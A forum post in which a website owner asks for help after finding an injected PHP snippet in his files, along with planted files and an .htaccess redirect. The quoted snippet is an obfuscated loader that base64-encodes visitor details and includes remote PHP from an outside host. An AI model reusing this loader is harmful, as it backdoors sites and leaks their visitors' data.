 How Do I Get Rid Of This!
I believe that my site has been hacked and/or corrupted by a virus. When I look at the individual files, I see the following snippet of code embedded in the .php files:
error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".b ase64_encode($c).".".base64_encode($g).".".base64_ encode($h).".".base64_encode($n);if((include_once( base64_decode("aHR0cDovLw==").base64_decode("dXNlc jcucGhwaW5jbHVkZS5ydQ==")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==").base64 _decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str);}
Additionally, I see files with such names as .htacess, messages.php, finfo.php, commands.php, etc. having been created in these directories.
The .htacess file has the following code snippet:
Options -MultiViews
ErrorDocument 404 //administrator/components/com_installer/layout.php
Can anyone tell me what happened and more importantly, how I get rid of it?
Any assistance you can provide would be GREATLY appreciated!
Regards,
Jason | 
Linear Mode
